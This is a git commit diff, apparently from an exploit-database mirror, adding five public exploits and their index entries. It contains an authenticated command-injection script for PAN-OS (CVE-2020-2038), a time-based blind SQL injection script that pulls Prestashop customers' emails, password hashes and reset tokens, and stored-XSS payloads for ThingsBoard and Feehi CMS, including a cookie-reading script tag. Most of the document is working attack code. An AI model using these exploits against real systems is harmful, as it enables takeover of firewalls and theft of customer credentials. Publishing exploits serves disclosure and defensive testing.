DB: 2022-08-10

5 changes to exploits/shellcodes PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated) Prestashop blockwishlist module 2.1.0 - SQLi Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS) ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS) ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)
2022-08-10 05:01:48 +00:00 · 2022-08-10 05:01:48 +00:00 · a8cb58b3e5
commit a8cb58b3e5
parent 34afdf0a9d
6 changed files with 386 additions and 0 deletions
--- a/exploits/multiple/remote/51005.py
+++ b/exploits/multiple/remote/51005.py
@ -0,0 +1,88 @@
+# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-08-13
+# Exploit Author: UnD3sc0n0c1d0
+# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038
+# Category: Web Application
+# Version: <10.0.1, <9.1.4 and <9.0.10
+# Tested on: PAN-OS 10.0 - Parrot OS
+# CVE : CVE-2020-2038
+#
+# Description:
+# An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
+# administrators to execute arbitrary OS commands with root privileges.
+# More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+# Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue.
+
+#!/usr/bin/env python3
+
+import requests
+import urllib3
+import sys
+import getopt
+import xmltodict
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def banner():
+    print('\n###########################################################################')
+    print('# Proof of Concept for CVE-2020-2038                                      #')
+    print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of   #')
+    print('# Positive Technologies                                                   #')
+    print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #')
+    print('#                                                                         #')
+    print('#                           Exploit by: Juampa Rodríguez (@UnD3sc0n0c1d0) #')
+    print('###########################################################################')
+
+def exploit(target,user,password,command):
+    apiparam = {'type': 'keygen', 'user': user, 'password': password}
+    apiresponse = requests.get(target+'api/', params=apiparam, verify=False)
+    xmlparse = xmltodict.parse(apiresponse.content)
+    apikey = xmlparse['response']['result']['key']
+    payload = '<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||'+command+'||]]></pattern></cms-ping>'
+    parameters = {'cmd': payload, 'type': 'op', 'key': apikey}
+    response = requests.get(target+'api', params=parameters, verify=False)
+    print(response.text[50:-20])
+
+def usage():
+    print('\nusage: CVE-2020-2038.py\n\n')
+    print('arguments:')
+    print('     -h      show this help message and exit')
+    print('     -t      target URL (ex: http://vulnerable.host/)')
+    print('     -u      target administrator user')
+    print('     -p      pasword of the defined user account')
+    print('     -c      command you want to execute on the target\n')
+
+def main(argv):
+    if len(sys.argv) < 9:
+        banner()
+        usage()
+        sys.exit()
+    try:
+        opts, args = getopt.getopt(argv,"ht:u:p:c:")
+    except getopt.GetoptError:
+        banner()
+        usage()
+        sys.exit()
+    for opt, arg in opts:
+        if opt == '-h':
+            usage()
+            sys.exit()
+        if opt == '-t':
+            target = arg
+        if opt == '-u':
+            user = arg
+        if opt == '-p':
+            password = arg
+        if opt == '-c':
+            command = arg
+    banner()
+    exploit(target,user,password,command)
+    sys.exit()
+
+if __name__ == "__main__":
+    try:
+        main(sys.argv[1:])
+    except KeyboardInterrupt:
+        print('Interrupted by users...')
+    except:
+        sys.exit()
--- a/exploits/multiple/webapps/51003.txt
+++ b/exploits/multiple/webapps/51003.txt
@ -0,0 +1,18 @@
+# Exploit Title:  ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)
+# Date: 03/08/2022
+# Exploit Author: Steffen Langenfeld & Sebastian Biehler
+# Vendor Homepage: https://thingsboard.io/
+# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
+# Version: 3.3.1
+# CVE : CVE-2021-42750
+# Tested on: Linux
+
+#Proof-Of-Concept:
+When creating a rule node (any) and putting a script payload inside the name of the rule node, it is executed upon hovering above the node within the editor.
+
+#Steps
+
+1. Create a new rule node (via the menu "Rule chains")
+2. Put a javascript payload within the name e.g <script>alert('XSS')</script>
+3. Save the node
+4. Upon hovering above the node within the editor the payload is executed
--- a/exploits/multiple/webapps/51004.txt
+++ b/exploits/multiple/webapps/51004.txt
@ -0,0 +1,19 @@
+# Exploit Title: ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)
+# Date: 03/08/2022
+# Exploit Author: Steffen Langenfeld & Sebastian Biehler
+# Vendor Homepage: https://thingsboard.io/
+# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
+# Version: 3.3.1
+# Tested on: [relevant os]
+# CVE : CVE-2021-42751
+# Tested on: Linux
+
+#Proof-Of-Concept:
+When creating a rule node (any) and putting a script payload inside the description of the rule node, it is executed upon hovering above the node within the editor.
+
+#Steps
+
+1. Create a new rule node (via the menu "Rule chains")
+2. Put a javascript payload within the description e.g <script>alert('XSS')</script>
+3. Save the node
+4. Upon hovering above the node within the editor the payload is executed
--- a/exploits/php/webapps/51001.py
+++ b/exploits/php/webapps/51001.py
@ -0,0 +1,239 @@
+# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi
+# Date: 29/07/22
+# Exploit Author: Karthik UJ (@5up3r541y4n)
+# Vendor Homepage: https://www.prestashop.com/en
+# Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0
+# Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/
+# Version (blockwishlist): 2.1.0
+# Version (prestashop): 1.7.8.1
+# Tested on: Linux
+# CVE: CVE-2022-31101
+
+
+# This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop
+
+import requests
+
+url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1
+cookie = input("Enter cookie value:\n")
+
+header = {
+    "Cookie": cookie
+}
+
+# Define static stuff
+param = "&order="
+staticStart = "p.name, (select case when ("
+staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc"
+charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~'
+charset = list(charset)
+emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.'
+emailCharset = list(emailCharset)
+
+
+# Query current database name length
+print("\nFinding db name's length:")
+for length in range(1, 65):
+    condition = "LENGTH(database())=" + str(length)
+    fullUrl = url + param + staticStart + condition + staticEnd
+
+    try:
+        req = requests.get(fullUrl, headers=header, timeout=8)
+    except requests.exceptions.Timeout:
+        dbLength=length
+        print("Length: ", length, end='')
+        print("\n")
+        break
+
+print("Enumerating current database name:")
+databaseName = ''
+for i in range(1, dbLength+1):
+    for char in charset:
+        condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')"
+        fullUrl = url + param + staticStart + condition + staticEnd
+
+        try:
+            req = requests.get(fullUrl, headers=header, timeout=8)
+        except requests.exceptions.Timeout:
+            print(char, end='')
+            databaseName += char
+            break
+print()
+
+# Enumerate any table
+prefix = "ps_"
+tableName = prefix + "customer"
+staticStart = "p.name, (select case when ("
+staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer="
+staticEnd2 = "); -- .asc"
+
+print("\nEnumerating " + tableName + " table")
+
+for id in range(1, 10):
+
+    condition = "id_customer=" + str(id)
+    fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+    try:
+        req = requests.get(fullUrl, headers=header, timeout=8)
+        print("\nOnly " + str(id - 1) + " records found. Exiting...")
+        break
+    except requests.exceptions.Timeout:
+        pass
+
+    print("\nid = " + str(id))
+
+    # Finding firstname length
+    for length in range(0, 100):
+        condition = "LENGTH(firstname)=" + str(length)
+        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+        try:
+            req = requests.get(fullUrl, headers=header, timeout=8)
+        except requests.exceptions.Timeout:
+            firstnameLength=length
+            print("Firstname length: ", length, end='')
+            print()
+            break
+
+
+    # Enumerate firstname
+    firstname = ''
+    print("Firstname: ", end='')
+    for i in range(1, length+1):
+        for char in charset:
+            condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'"
+            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+            try:
+                req = requests.get(fullUrl, headers=header, timeout=8)
+            except requests.exceptions.Timeout:
+                print(char, end='')
+                firstname += char
+                break
+    print()
+
+    # Finding lastname length
+    for length in range(1, 100):
+        condition = "LENGTH(lastname)=" + str(length)
+        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+        try:
+            req = requests.get(fullUrl, headers=header, timeout=8)
+        except requests.exceptions.Timeout:
+            lastnameLength=length
+            print("Lastname length: ", length, end='')
+            print()
+            break
+
+    # Enumerate lastname
+    lastname = ''
+    print("Lastname: ", end='')
+    for i in range(1, length+1):
+        for char in charset:
+            condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'"
+            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+            try:
+                req = requests.get(fullUrl, headers=header, timeout=8)
+            except requests.exceptions.Timeout:
+                print(char, end='')
+                firstname += char
+                break
+    print()
+
+    # Finding email length
+    for length in range(1, 320):
+        condition = "LENGTH(email)=" + str(length)
+        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+        try:
+            req = requests.get(fullUrl, headers=header, timeout=8)
+        except requests.exceptions.Timeout:
+            emailLength=length
+            print("Email length: ", length, end='')
+            print()
+            break
+
+    # Enumerate email
+    email = ''
+    print("Email: ", end='')
+    for i in range(1, length+1):
+        for char in emailCharset:
+            condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'"
+            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+            try:
+                req = requests.get(fullUrl, headers=header, timeout=8)
+                if req.status_code == 500 and char == '.':
+                    print(char, end='')
+                    email += char
+            except requests.exceptions.Timeout:
+                print(char, end='')
+                email += char
+                break
+    print()
+
+    # Finding password hash length
+    for length in range(1, 500):
+        condition = "LENGTH(passwd)=" + str(length)
+        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+        try:
+            req = requests.get(fullUrl, headers=header, timeout=8)
+        except requests.exceptions.Timeout:
+            passwordHashLength=length
+            print("Password hash length: ", length, end='')
+            print()
+            break
+
+    # Enumerate password hash
+    passwordHash = ''
+    print("Password hash: ", end='')
+    for i in range(1, length+1):
+        for char in emailCharset:
+            condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'"
+            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+            try:
+                req = requests.get(fullUrl, headers=header, timeout=8)
+                if req.status_code == 500 and char == '.':
+                    print(char, end='')
+                    passwordHash += char
+            except requests.exceptions.Timeout:
+                print(char, end='')
+                passwordHash += char
+                break
+    print()
+
+    # Finding password reset token length
+    for length in range(0, 500):
+        condition = "LENGTH(reset_password_token)=" + str(length)
+        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+        try:
+            req = requests.get(fullUrl, headers=header, timeout=8)
+        except requests.exceptions.Timeout:
+            passwordResetTokenLength=length
+            print("Password reset token length: ", length, end='')
+            print()
+            break
+
+    # Enumerate password reset token
+    passwordResetToken = ''
+    print("Password reset token: ", end='')
+    for i in range(1, length+1):
+        for char in emailCharset:
+            condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'"
+            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+            try:
+                req = requests.get(fullUrl, headers=header, timeout=8)
+                if req.status_code == 500 and char == '.':
+                    print(char, end='')
+                    passwordResetToken += char
+            except requests.exceptions.Timeout:
+                print(char, end='')
+                passwordResetToken += char
+                break
+    print()
--- a/exploits/php/webapps/51002.txt
+++ b/exploits/php/webapps/51002.txt
@ -0,0 +1,17 @@
+# Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)
+# Date: 02-08-2022
+# Exploit Author: Shivam Singh
+# Vendor Homepage: https://feehi.com/
+# Software Link: https://github.com/liufee/cms
+#Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/
+# Version: 2.1.1 (REQUIRED)
+# Tested on: Linux, Windows, Docker
+# CVE : CVE-2022-34140
+
+
+# Proof of Concept:
+1-Sing-up https://localhost.cms.feehi/
+2-Inject The XSS Payload in Username:
+"><script>alert(document.cookie)</script> fill all required fields and
+click the SignUp button
+3-Login to Your Account, Go to any article page then XSS will trigger.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18721,6 +18721,7 @@ id,file,description,date,author,type,platform,port
 50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
 51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux,
+51005,exploits/multiple/remote/51005.py,"PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UnD3sc0n0c1d0,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -45062,3 +45063,7 @@ id,file,description,date,author,type,platform,port
 50995,exploits/php/webapps/50995.py,"mPDF 7.0 - Local File Inclusion",1970-01-01,"Musyoka Ian",webapps,php,
 50997,exploits/php/webapps/50997.py,"NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,p1ckzi,webapps,php,
 50998,exploits/linux/webapps/50998.py,"Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Emir Polat",webapps,linux,
+51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",1970-01-01,"Karthik UJ",webapps,php,
+51002,exploits/php/webapps/51002.txt,"Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Shivam Singh",webapps,php,
+51003,exploits/multiple/webapps/51003.txt,"ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
+51004,exploits/multiple/webapps/51004.txt,"ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,